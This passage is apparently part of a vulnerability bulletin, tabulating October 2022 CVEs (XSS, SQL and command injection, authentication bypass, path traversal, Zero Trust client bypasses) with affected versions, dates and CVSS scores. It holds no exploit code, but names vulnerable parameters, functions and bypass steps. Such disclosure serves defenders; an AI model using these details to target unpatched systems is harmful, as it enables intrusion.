twistedmatrix — twisted	Twisted is an event-based framework for internet applications. Started with version 0.9.4, when the host header does not match a configured host `twisted.web.vhost.NameVirtualHost` will return a `NoResource` resource which renders the Host header unescaped into the 404 response allowing HTML and script injection. In practice this should be very difficult to exploit as being able to modify the Host header of a normal HTTP request implies that one is already in a privileged position. This issue was fixed in version 22.10.0rc1. There are no known workarounds.	2022-10-26	5.4	CVE-2022-39348 MISC CONFIRM MISC
weseek — growi	Improper access control vulnerability in GROWI prior to v5.1.4 (v5 series) and versions prior to v4.5.25 (v4 series) allows a remote authenticated attacker to bypass access restriction and download the markdown data from the pages set to private by the other users.	2022-10-24	6.5	CVE-2022-41799 MISC MISC
wp_humans.txt_project — wp_humans.txt	The WP Humans.txt WordPress plugin through 1.0.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)	2022-10-25	4.8	CVE-2022-3392 CONFIRM
yordam — library_automation_system	Yordam Library Information Document Automation product before version 19.02 has an unauthenticated reflected XSS vulnerability.	2022-10-27	6.1	CVE-2021-45476 CONFIRM

Low Vulnerabilities

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
getkirby — kirby	Kirby is a flat-file CMS. In versions prior to 3.5.8.2, 3.6.6.2, 3.7.5.1, and 3.8.1, Kirby is subject to user enumeration due to Improper Restriction of Excessive Authentication Attempts. This vulnerability affects you only if you are using the `code` or `password-reset` auth method with the `auth.methods` option or if you have enabled the `debug` option in production. By using two or more IP addresses and multiple login attempts, valid user accounts will lock, but invalid accounts will not, leading to account enumeration. This issue has been patched in versions 3.5.8.2, 3.6.6.2, 3.7.5.1, and 3.8.1. If you cannot update immediately, you can work around the issue by setting the `auth.methods` option to `password`, which disables the code-based login and password reset forms.	2022-10-24	3.7	CVE-2022-39314 CONFIRM
linux — linux_kernel	A vulnerability was found in Linux Kernel and classified as problematic. Affected by this issue is the function rlb_arp_xmit of the file drivers/net/bonding/bond_alb.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211928.	2022-10-21	3.3	CVE-2022-3624 N/A N/A
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been declared as problematic. This vulnerability affects the function vsock_connect of the file net/vmw_vsock/af_vsock.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. VDB-211930 is the identifier assigned to this vulnerability.	2022-10-21	3.3	CVE-2022-3629 N/A N/A
linux — linux_kernel	A vulnerability classified as problematic has been found in Linux Kernel. Affected is the function j1939_session_destroy of the file net/can/j1939/transport.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211932.	2022-10-21	3.3	CVE-2022-3633 MISC MISC
robustel — r1510_firmware	A firmware update vulnerability exists in the sysupgrade functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network packet can lead to arbitrary firmware update. An attacker can send a sequence of requests to trigger this vulnerability.	2022-10-25	2.7	CVE-2022-34845 MISC

Severity Not Yet Assigned

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
alivecor — kardiamobile	The physical IoT device of the AliveCor’s KardiaMobile, a smartphone-based personal electrocardiogram (EKG) has no encryption for its data-over-sound protocols. Exploiting this vulnerability could allow an attacker to read patient EKG results or create a denial-of-service condition by emitting sounds at similar frequencies as the device, disrupting the smartphone microphone’s ability to accurately read the data. To carry out this attack, the attacker must be close (less than 5 feet) to pick up and emit sound waves.	2022-10-27	not yet calculated	CVE-2022-41627 MISC
ansible — ansible	A flaw was found in Ansible in the amazon.aws collection when using the tower_callback parameter from the amazon.aws.ec2_instance module. This flaw allows an attacker to take advantage of this issue as the module is handling the parameter insecurely, leading to the password leaking in the logs.	2022-10-28	not yet calculated	CVE-2022-3697 MISC
apache — dolphinscheduler	Users can read any files by log server, Apache DolphinScheduler users should upgrade to version 2.0.6 or higher.	2022-10-28	not yet calculated	CVE-2022-26884 MISC MLIST
aruba — edgeconnect_enterprise_orchestrator	Vulnerabilities in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an unauthenticated remote attacker to bypass authentication. Successful exploitation of these vulnerabilities could allow an attacker to gain administrative privileges leading to a complete compromise of the Aruba EdgeConnect Enterprise Orchestrator with versions 9.1.2.40051 and below, 9.0.7.40108 and below, 8.10.23.40009 and below, and any older branches of Orchestrator not specifically mentioned.	2022-10-28	not yet calculated	CVE-2022-37913 MISC
aruba — edgeconnect_enterprise_orchestrator	Vulnerabilities in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an unauthenticated remote attacker to bypass authentication. Successful exploitation of these vulnerabilities could allow an attacker to gain administrative privileges leading to a complete compromise of the Aruba EdgeConnect Enterprise Orchestrator with versions 9.1.2.40051 and below, 9.0.7.40108 and below, 8.10.23.40009 and below, and any older branches of Orchestrator not specifically mentioned.	2022-10-28	not yet calculated	CVE-2022-37914 MISC
aruba — edgeconnect_enterprise_orchestrator	A vulnerability in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an unauthenticated remote attacker to run arbitrary commands on the underlying host. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the underlying operating system leading to a complete system compromise of Aruba EdgeConnect Enterprise Orchestration with versions 9.1.x branch only, Any 9.1.x Orchestrator instantiated as a new machine with a release prior to 9.1.3.40197, Orchestrators upgraded to 9.1.x were not affected.	2022-10-28	not yet calculated	CVE-2022-37915 MISC
bosch — videojet_multi_4000	An error in the URL handler of the VIDEOJET multi 4000 may lead to a reflected cross site scripting (XSS) in the web-based interface. An attacker with knowledge of the encoder address can send a crafted link to a user, which will execute JavaScript code in the context of the user.	2022-10-27	not yet calculated	CVE-2022-40183 CONFIRM
bosch — videojet_multi_4000	Incomplete filtering of JavaScript code in different configuration fields of the web based interface of the VIDEOJET multi 4000 allows an attacker with administrative credentials to store JavaScript code which will be executed for all administrators accessing the same configuration option.	2022-10-27	not yet calculated	CVE-2022-40184 CONFIRM
chatwoot — chatwoot	Impact varies for each individual vulnerability in the application. For generation of accounts, it may be possible, depending on the amount of system resources available, to create a DoS event in the server. These accounts still need to be activated; however, it is possible to identify the output Status Code to separate accounts that are generated and waiting for email verification. nnFor the sign in directories, it is possible to brute force login attempts to either login portal, which could lead to account compromise.	2022-10-28	not yet calculated	CVE-2022-3741 CONFIRM MISC
cisco — anyconnect	A vulnerability in the Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z3 Teleworker Gateway devices could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to insufficient validation of client-supplied parameters while establishing an SSL VPN session. An attacker could exploit this vulnerability by crafting a malicious request and sending it to the affected device. A successful exploit could allow the attacker to cause the Cisco AnyConnect VPN server to crash and restart, resulting in the failure of the established SSL VPN connections and forcing remote users to initiate a new VPN connection and re-authenticate. A sustained attack could prevent new SSL VPN connections from being established. Note: When the attack traffic stops, the Cisco AnyConnect VPN server recovers gracefully without requiring manual intervention. Cisco Meraki has released software updates that address this vulnerability.	2022-10-26	not yet calculated	CVE-2022-20933 CISCO
cisco — identity_services_engine	A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to read and delete files on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request that contains certain character sequences to an affected system. A successful exploit could allow the attacker to read or delete specific files on the device that their configured administrative level should not have access to. Cisco plans to release software updates that address this vulnerability.	2022-10-26	not yet calculated	CVE-2022-20822 CISCO
cisco — telepresence_and_roomos	Multiple vulnerabilities in Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an attacker to conduct path traversal attacks, view sensitive data, or write arbitrary files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.	2022-10-26	not yet calculated	CVE-2022-20776 CISCO
cisco — telepresence_and_roomos	Multiple vulnerabilities in Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an attacker to conduct path traversal attacks, view sensitive data, or write arbitrary files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.	2022-10-26	not yet calculated	CVE-2022-20811 CISCO
cisco — telepresence_and_roomos	Multiple vulnerabilities in Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an attacker to conduct path traversal attacks, view sensitive data, or write arbitrary files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.	2022-10-26	not yet calculated	CVE-2022-20953 CISCO
cisco — telepresence_and_roomos	Multiple vulnerabilities in Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an attacker to conduct path traversal attacks, view sensitive data, or write arbitrary files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.	2022-10-26	not yet calculated	CVE-2022-20954 CISCO
cisco — telepresence_and_roomos	Multiple vulnerabilities in Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an attacker to conduct path traversal attacks, view sensitive data, or write arbitrary files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.	2022-10-26	not yet calculated	CVE-2022-20955 CISCO
cloudflare — octorpki	Attackers can create long chains of CAs that would lead to OctoRPKI exceeding its max iterations parameter. In consequence it would cause the program to crash, preventing it from finishing the validation and leading to a denial of service.	2022-10-28	not yet calculated	CVE-2022-3616 MISC
cloudflare — warp_client	Using warp-cli command “add-trusted-ssid”, a user was able to disconnect WARP client and bypass the “Lock WARP switch” feature resulting in Zero Trust policies not being enforced on an affected endpoint.	2022-10-28	not yet calculated	CVE-2022-3512 MISC
cloudflare — warp_mobile_client	It was possible for a user to delete a VPN profile from WARP mobile client on iOS platform despite the Lock WARP switch https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/warp-settings/#lock-warp-switch feature being enabled on Zero Trust Platform. This led to bypassing policies and restrictions enforced for enrolled devices by the Zero Trust platform.	2022-10-28	not yet calculated	CVE-2022-3337 MISC
cloudflare — zero_trust_platform	It was possible to bypass policies configured for Zero Trust Secure Web Gateway by using warp-cli ‘set-custom-endpoint’ subcommand. Using this command with an unreachable endpoint caused the WARP Client to disconnect and allowed bypassing administrative restrictions on a Zero Trust enrolled endpoint.	2022-10-28	not yet calculated	CVE-2022-3320 MISC
cloudflare — zero_trust_platform	It was possible to bypass Lock WARP switch feature https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/warp-settings/#lock-warp-switch on the WARP iOS mobile client by enabling both “Disable for cellular networks” and “Disable for Wi-Fi networks” switches at once in the application settings. Such configuration caused the WARP client to disconnect and allowed the user to bypass restrictions and policies enforced by the Zero Trust platform.	2022-10-28	not yet calculated	CVE-2022-3321 MISC
cloudflare — zero_trust_platform	Lock Warp switch is a feature of Zero Trust platform which, when enabled, prevents users of enrolled devices from disabling WARP client. Due to insufficient policy verification by WARP iOS client, this feature could be bypassed by using the “Disable WARP” quick action.	2022-10-28	not yet calculated	CVE-2022-3322 MISC
curl — curl	curl before 7.86.0 has a double free. If curl is told to use an HTTP proxy for a transfer with a non-HTTP(S) URL, it sets up the connection to the remote server by issuing a CONNECT request to the proxy, and then tunnels the rest of the protocol through. An HTTP proxy might refuse this request (HTTP proxies often only allow outgoing connections to specific port numbers, like 443 for HTTPS) and instead return a non-200 status code to the client. Due to flaws in the error/cleanup handling, this could trigger a double free in curl if one of the following schemes were used in the URL for the transfer: dict, gopher, gophers, ldap, ldaps, rtmp, rtmps, or telnet. The earliest affected version is 7.77.0.	2022-10-29	not yet calculated	CVE-2022-42915 MISC FEDORA
curl — curl	In curl before 7.86.0, the HSTS check could be bypassed to trick it into staying with HTTP. Using its HSTS support, curl can be instructed to use HTTPS directly (instead of using an insecure cleartext HTTP step) even when HTTP is provided in the URL. This mechanism could be bypassed if the host name in the given URL uses IDN characters that get replaced with ASCII counterparts as part of the IDN conversion, e.g., using the character UTF-8 U+3002 (IDEOGRAPHIC FULL STOP) instead of the common ASCII full stop of U+002E (.). The earliest affected version is 7.77.0 2021-05-26.	2022-10-29	not yet calculated	CVE-2022-42916 MISC FEDORA
datahub — datahub	DataHub is an open-source metadata platform. Prior to version 0.8.45, the `StatelessTokenService` of the DataHub metadata service (GMS) does not verify the signature of JWT tokens. This allows an attacker to connect to DataHub instances as any user if Metadata Service authentication is enabled. This vulnerability occurs because the `StatelessTokenService` of the Metadata service uses the `parse` method of `io.jsonwebtoken.JwtParser`, which does not perform a verification of the cryptographic token signature. This means that JWTs are accepted regardless of the used algorithm. This issue may lead to an authentication bypass. Version 0.8.45 contains a patch for the issue. There are no known workarounds.	2022-10-28	not yet calculated	CVE-2022-39366 MISC MISC MISC CONFIRM MISC
dzzoffice — dzzoffice	A Cross-Site Request Forgery (CSRF) in dzzoffice 2.02.1_SC_UTF8 allows attackers to arbitrarily create user accounts and grant Administrator rights to regular users.	2022-10-27	not yet calculated	CVE-2022-43340 MISC MISC MISC
eaton — foreseer_epms	A security vulnerability was discovered in the Eaton Foreseer EPMS software. Foreseer EPMS connects an operation’s vast array of devices to assist in the reduction of energy consumption and avoid unplanned downtime caused by the failures of critical systems. A threat actor may upload arbitrary files using the file upload feature. This vulnerability is present in versions 4.x, 5.x, 6.x & 7.0 to 7.5. A new version (v7.6) containing the remediation has been made available by Eaton and a mitigation has been provided for the affected versions that are currently supported. Customers are advised to update the software to the latest version (v7.6). Foreseer EPMS versions 4.x, 5.x, 6.x are no longer supported by Eaton. Please refer to the End-of-Support notification https://www.eaton.com/in/en-us/catalog/services/foreseer/foreseer-legacy.html .	2022-10-28	not yet calculated	CVE-2022-33859 MISC
esri — arcgis_server	Esri ArcGIS Server versions 10.9.1 and prior have a path traversal vulnerability that may result in a denial of service by allowing a remote, authenticated attacker to overwrite internal ArcGIS Server directory.	2022-10-25	not yet calculated	CVE-2022-38196 CONFIRM
esri — arcgis_server	Esri ArcGIS Server versions 10.9.1 and below have an unvalidated redirect issue that may allow a remote, unauthenticated attacker to phish a user into accessing an attacker controlled website via a crafted query parameter.	2022-10-25	not yet calculated	CVE-2022-38197 CONFIRM
esri — arcgis_server	A cross site scripting vulnerability exists in some map service configurations of ArcGIS Server versions 10.8.1 and 10.7.1. Specifically crafted web requests can execute arbitrary JavaScript in the context of the victim’s browser.	2022-10-25	not yet calculated	CVE-2022-38200 CONFIRM
exiv2 — exiv2	A vulnerability was found in Exiv2 and classified as problematic. This issue affects the function QuickTimeVideo::userDataDecoder of the file quicktimevideo.cpp of the component QuickTime Video Handler. The manipulation leads to null pointer dereference. The attack may be initiated remotely. The name of the patch is 6bb956ad808590ce2321b9ddf6772974da27c4ca. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-212495.	2022-10-29	not yet calculated	CVE-2022-3755 MISC MISC MISC
exiv2 — exiv2	A vulnerability was found in Exiv2. It has been classified as critical. Affected is the function QuickTimeVideo::userDataDecoder of the file quicktimevideo.cpp of the component QuickTime Video Handler. The manipulation leads to integer overflow. It is possible to launch the attack remotely. The name of the patch is bf4f28b727bdedbd7c88179c30d360e54568a62e. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-212496.	2022-10-29	not yet calculated	CVE-2022-3756 MISC MISC
exiv2 — exiv2	A vulnerability was found in Exiv2. It has been declared as critical. Affected by this vulnerability is the function QuickTimeVideo::decodeBlock of the file quicktimevideo.cpp of the component QuickTime Video Handler. The manipulation leads to buffer overflow. The attack can be launched remotely. The name of the patch is d3651fdbd352cbaf259f89abf7557da343339378. It is recommended to apply a patch to fix this issue. The identifier VDB-212497 was assigned to this vulnerability.	2022-10-29	not yet calculated	CVE-2022-3757 MISC MISC MISC
forgerock — access_management	It may be possible to gain some details of the deployment through a well-crafted attack. This may allow that data to be used to probe internal network services.	2022-10-27	not yet calculated	CVE-2022-24669 MISC MISC
forgerock — access_management	An attacker can use the unrestricted LDAP queries to determine configuration entries	2022-10-27	not yet calculated	CVE-2022-24670 MISC MISC
gitlab — gitlab	An issue has been discovered in GitLab affecting all versions starting from 10.0 before 12.9.8, all versions starting from 12.10 before 12.10.7, all versions starting from 13.0 before 13.0.1. TODO	2022-10-28	not yet calculated	CVE-2022-2826 CONFIRM MISC MISC
gl-inet — multiple_products	gl-inet GL-MT300N-V2 Mango v3.212 and GL-AX1800 Flint v3.214 were discovered to contain multiple command injection vulnerabilities via the ping_addr and trace_addr function parameters.	2022-10-27	not yet calculated	CVE-2022-31898 MISC
gl.inet_goodcloud_iot_device_management_system — gl.inet_goodcloud_iot_device_management_system	Multiple stored cross-site scripting (XSS) vulnerabilities in GL.iNet GoodCloud IoT Device Management System Version 1.00.220412.00 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Company Name and Description text fields.	2022-10-27	not yet calculated	CVE-2022-42054 MISC
gl.inet_goodcloud_iot_device_management_system — gl.inet_goodcloud_iot_device_management_system	Multiple command injection vulnerabilities in GL.iNet GoodCloud IoT Device Management System Version 1.00.220412.00 via the ping and traceroute tools allow attackers to read arbitrary files on the system.	2022-10-27	not yet calculated	CVE-2022-42055 MISC
google — multiple_products	The implementation of backslash parsing in the Dart URI class for versions prior to 2.18 and Flutter versions prior to 3.30 differs from the WhatWG URL standards. Dart uses the RFC 3986 syntax, which creates incompatibilities with the ” characters in URIs, which can lead to auth bypass in webapps interpreting URIs. We recommend updating Dart or Flutter to mitigate the issue.	2022-10-27	not yet calculated	CVE-2022-3095 CONFIRM
haas — haas_cnc_controller	Communication traffic involving “Ethernet Q Commands” service of Haas Controller version 100.20.000.1110 is transmitted in cleartext. This allows an attacker to obtain sensitive information being passed to and from the controller.	2022-10-28	not yet calculated	CVE-2022-41636 MISC
haas_automation_inc — haas_controller	Authentication is currently unsupported in Haas Controller version 100.20.000.1110 when using the “Ethernet Q Commands” service, which allows any user on the same network segment as the controller (even while connected remotely) to access the service and write unauthorized macros to the device.	2022-10-28	not yet calculated	CVE-2022-2474 MISC
haas_automation_inc — haas_controller	Haas Controller version 100.20.000.1110 has insufficient granularity of access control when using the “Ethernet Q Commands” service. Any user is able to write macros into registers outside of the authorized accessible range. This could allow a user to access privileged resources or resources out of context.	2022-10-28	not yet calculated	CVE-2022-2475 MISC
heidenhain — controller_tnc_640	The HEIDENHAIN Controller TNC 640, version 340590 07 SP5, running HEROS 5.08.3 controlling the HARTFORD 5A-65E CNC machine is vulnerable to improper authentication, which may allow an attacker to deny service to the production line, steal sensitive data from the production line, and alter any products created by the production line.	2022-10-28	not yet calculated	CVE-2022-41648 MISC
honeywell — experion_pks	Honeywell Experion PKS C200, C200E, C300, and ACE controllers are vulnerable to improper neutralization of special elements in output, which may allow an attacker to remotely execute arbitrary code and cause a denial-of-service condition.	2022-10-28	not yet calculated	CVE-2021-38395 CONFIRM CONFIRM
honeywell — experion_pks	Honeywell Experion PKS C200, C200E, C300, and ACE controllers are vulnerable to unrestricted file uploads, which may allow an attacker to remotely execute arbitrary code and cause a denial-of-service condition.	2022-10-28	not yet calculated	CVE-2021-38397 CONFIRM CONFIRM
honeywell — experion_pks	Honeywell Experion PKS C200, C200E, C300, and ACE controllers are vulnerable to relative path traversal, which may allow an attacker access to unauthorized files and directories.	2022-10-28	not yet calculated	CVE-2021-38399 CONFIRM CONFIRM
horner_automation — cscape	Horner Automation’s Cscape version 9.90 SP 7 and prior does not properly validate user-supplied data. If a user opens a maliciously formed FNT file, then an attacker could execute arbitrary code within the current process by accessing an uninitialized pointer, leading to an out-of-bounds memory write.	2022-10-27	not yet calculated	CVE-2022-3378 MISC
horner_automation — cscape	Horner Automation’s Cscape version 9.90 SP7 and prior does not properly validate user-supplied data. If a user opens a maliciously formed FNT file, then an attacker could execute arbitrary code within the current process by writing outside the memory buffer.	2022-10-27	not yet calculated	CVE-2022-3379 MISC
host_engineering — h0-ecom100	Using custom code, an attacker can write into name or description fields larger than the appropriate buffer size causing a stack-based buffer overflow on Host Engineering H0-ECOM100 Communications Module Firmware versions v5.0.155 and prior. This may allow an attacker to crash the affected device or cause it to become unresponsive.	2022-10-28	not yet calculated	CVE-2022-3228 MISC
iku-soft — rdiffweb	Business Logic Errors in GitHub repository ikus060/rdiffweb prior to 2.5.0a7.	2022-10-26	not yet calculated	CVE-2022-3363 CONFIRM MISC
ip-com_ew9 — ip-com_ew9	An access control issue in the password reset page of IP-COM EW9 V15.11.0.14(9732) allows unauthenticated attackers to arbitrarily change the admin password.	2022-10-27	not yet calculated	CVE-2022-43364 MISC
ip-com_ew9 — ip-com_ew9	IP-COM EW9 V15.11.0.14(9732) was discovered to contain a buffer overflow in the formSetDebugCfg function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.	2022-10-27	not yet calculated	CVE-2022-43365 MISC
ip-com_ew9 — ip-com_ew9	IP-COM EW9 V15.11.0.14(9732) allows unauthenticated attackers to access sensitive information via the checkLoginUser, ate, telnet, version, setDebugCfg, and boot interfaces.	2022-10-27	not yet calculated	CVE-2022-43366 MISC
ip-com_ew9 — ip-com_ew9	IP-COM EW9 V15.11.0.14(9732) was discovered to contain a command injection vulnerability in the formSetDebugCfg function.	2022-10-27	not yet calculated	CVE-2022-43367 MISC
johnson_controls — cevas	All versions of CEVAS prior to 1.01.46 do not sufficiently validate user-controllable input and could allow a user to bypass authentication and retrieve data with specially crafted SQL queries.	2022-10-28	not yet calculated	CVE-2021-36206 CERT CONFIRM
mitel — micollab	A vulnerability in the web conferencing component of Mitel MiCollab through 9.5.0.101 could allow an unauthenticated attacker to upload malicious files. A successful exploit could allow an attacker to execute arbitrary code within the context of the application.	2022-10-25	not yet calculated	CVE-2022-36452 MISC MISC
multipath-tools — multipath-tools	multipath-tools 0.7.7 through 0.9.x before 0.9.2 allows local users to obtain root access, as exploited in conjunction with CVE-2022-41974. Local users able to access /dev/shm can change symlinks in multipathd due to incorrect symlink handling, which could lead to controlled file writes outside of the /dev/shm directory. This could be used indirectly for local privilege escalation to root.	2022-10-29	not yet calculated	CVE-2022-41973 MISC MISC MISC FULLDISC
multipath-tools — multipath-tools	multipath-tools 0.7.0 through 0.9.x before 0.9.2 allows local users to obtain root access, as exploited alone or in conjunction with CVE-2022-41973. Local users able to write to UNIX domain sockets can bypass access controls and manipulate the multipath setup. This can lead to local privilege escalation to root. This occurs because an attacker can repeat a keyword, which is mishandled because arithmetic ADD is used instead of bitwise OR.	2022-10-29	not yet calculated	CVE-2022-41974 MISC MISC MISC FULLDISC
multiple_products — multiple_products	In Tenda ax1803 v1.0.0.1, the http requests handled by the fromAdvSetMacMtuWan functions, wanSpeed, cloneType, mac, can cause a stack overflow and enable remote code execution (RCE).	2022-10-27	not yet calculated	CVE-2022-40876 MISC MISC
nextcloud — server	Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform. Nextcloud Server and Nextcloud Enterprise Server prior to versions 23.0.9 and 24.0.5 are vulnerable to exposure of information that cannot be controlled by administrators without direct database access. Versions 23.0.9 and 24.0.5 contains patches for this issue. No known workarounds are available.	2022-10-27	not yet calculated	CVE-2022-39329 MISC CONFIRM MISC
nextcloud — server	Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform. Nextcloud Server prior to versions 23.0.10 and 24.0.6 and Nextcloud Enterprise Server prior to versions 22.2.10, 23.0.10, and 24.0.6 are vulnerable to a logged-in attacker slowing down the system by generating a lot of database/cpu load. Nextcloud Server versions 23.0.10 and 24.0.6 and Nextcloud Enterprise Server versions 22.2.10, 23.0.10, and 24.0.6 contain patches for this issue. As a workaround, disable the Circles app.	2022-10-27	not yet calculated	CVE-2022-39330 MISC CONFIRM MISC
nextcloud — server	Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform. In Nextcloud Server prior to versions 23.0.9 and 24.0.5 and Nextcloud Enterprise Server prior to versions 22.2.10.5, 23.0.9, and 24.0.5 an attacker reading `nextcloud.log` may gain knowledge of credentials to connect to a SharePoint service. Nextcloud Server versions 23.0.9 and 24.0.5 and Nextcloud Enterprise Server versions 22.2.10.5, 23.0.9, and 24.0.5 contain a patch for this issue. As a workaround, set `zend.exception_ignore_args = On` as an option in `php.ini`.	2022-10-27	not yet calculated	CVE-2022-39364 MISC CONFIRM MISC MISC
nginx_njs — nginx_njs	Nginx NJS v0.7.2 to v0.7.4 was discovered to contain a segmentation violation via njs_scope_valid_value at njs_scope.h.	2022-10-28	not yet calculated	CVE-2022-43284 MISC MISC
nginx_njs — nginx_njs	Nginx NJS v0.7.4 was discovered to contain a segmentation violation in njs_promise_reaction_job.	2022-10-28	not yet calculated	CVE-2022-43285 MISC
nginx_njs — nginx_njs	Nginx NJS v0.7.2 was discovered to contain a heap-use-after-free bug caused by illegal memory copy in the function njs_json_parse_iterator_call at njs_json.c.	2022-10-28	not yet calculated	CVE-2022-43286 MISC MISC
openbmc — bmcweb	A vulnerability in bmcweb of OpenBMC Project allows user to cause denial of service. When fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS.	2022-10-27	not yet calculated	CVE-2022-2809 CONFIRM
openbmc — openbmc	A vulnerability in bmcweb of OpenBMC Project allows user to cause denial of service. This vulnerability was identified during mitigation for CVE-2022-2809. When fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS.	2022-10-27	not yet calculated	CVE-2022-3409 CONFIRM
opennebula — opennebula	Files or Directories Accessible to External Parties vulnerability in OpenNebula on Linux allows File Discovery.	2022-10-28	not yet calculated	CVE-2022-37424 MISC
opennebula — opennebula	Improper Neutralization of Special Elements used in a Command (‘Command Injection’) vulnerability in OpenNebula OpenNebula core on Linux allows Remote Code Inclusion.	2022-10-28	not yet calculated	CVE-2022-37425 MISC
opennebula — opennebula	Unrestricted Upload of File with Dangerous Type vulnerability in OpenNebula OpenNebula core on Linux allows File Content Injection.	2022-10-28	not yet calculated	CVE-2022-37426 MISC
packet_storm — hashicorp_boundary	Hashicorp Boundary v0.8.0 is vulnerable to Clickjacking which allow for the interception of login credentials, re-direction of users to malicious sites, or causing users to perform malicious actions on the site.	2022-10-27	not yet calculated	CVE-2022-36182 MISC MISC
phpmyfaq — phpmyfaq	Weak Password Requirements in GitHub repository thorsten/phpmyfaq prior to 3.1.8.	2022-10-29	not yet calculated	CVE-2022-3754 MISC CONFIRM
pimcore — pimcore	Pimcore is an open source data and experience management platform. Prior to version 10.5.9, the user controlled twig templates rendering in `Pimcore/Mail` & `ClassDefinitionLayoutText` is vulnerable to server-side template injection, which could lead to remote code execution. Version 10.5.9 contains a patch for this issue. As a workaround, one may apply the patch manually.	2022-10-27	not yet calculated	CVE-2022-39365 MISC MISC MISC CONFIRM
qtiworks — qtiworks	QTIWorks is a software suite for standards-based assessment delivery. Prior to version 1.0-beta15, the QTIWorks Engine allows users to upload QTI content packages as ZIP files. The ZIP handling code does not sufficiently check the paths of files contained within ZIP files, so can insert files into other locations in the filesystem if they are writable by the process running the QTIWorks Engine. In extreme cases, this could allow anonymous users to change files in arbitrary locations in the filesystem. In normal QTIWorks Engine deployments, the impact is somewhat reduced because the default QTIWorks configuration does not enable the public demo functionality, so ZIP files can only be uploaded by users with “instructor” privileges. This vulnerability is fixed in version 1.0-beta15. There are no database configuration changes required when upgrading to this version. No known workarounds for this issue exist.	2022-10-28	not yet calculated	CVE-2022-39367 MISC MISC CONFIRM
redis — redis	A vulnerability was found in Redis. It has been declared as critical. This vulnerability affects unknown code in the library C:/Program Files/Redis/dbghelp.dll. The manipulation leads to uncontrolled search path. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-212416.	2022-10-28	not yet calculated	CVE-2022-3734 N/A N/A
resolveshims — resolveshims	Prototype pollution vulnerability in function resolveShims in resolve-shims.js in thlorenz browserify-shim 3.8.15 via the fullPath variable in resolve-shims.js.	2022-10-28	not yet calculated	CVE-2022-37621 MISC MISC MISC
rockwell_automation — factorytalk_alarm_and_events	An unauthenticated attacker with network access to a victim’s Rockwell Automation FactoryTalk Alarm and Events service could open a connection, causing the service to fault and become unavailable. The affected port could be used as a server ping port and uses messages structured with XML.	2022-10-27	not yet calculated	CVE-2022-38744 MISC
rukovoditel — rukovoditel	A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking “Add”.	2022-10-28	not yet calculated	CVE-2022-43167 MISC
rukovoditel — rukovoditel	Rukovoditel v3.2.1 was discovered to contain a SQL injection vulnerability via the reports_id parameter.	2022-10-28	not yet calculated	CVE-2022-43168 MISC
rukovoditel — rukovoditel	A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking “Add New Group”.	2022-10-28	not yet calculated	CVE-2022-43169 MISC
rukovoditel — rukovoditel	A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking “Add info block”.	2022-10-28	not yet calculated	CVE-2022-43170 MISC
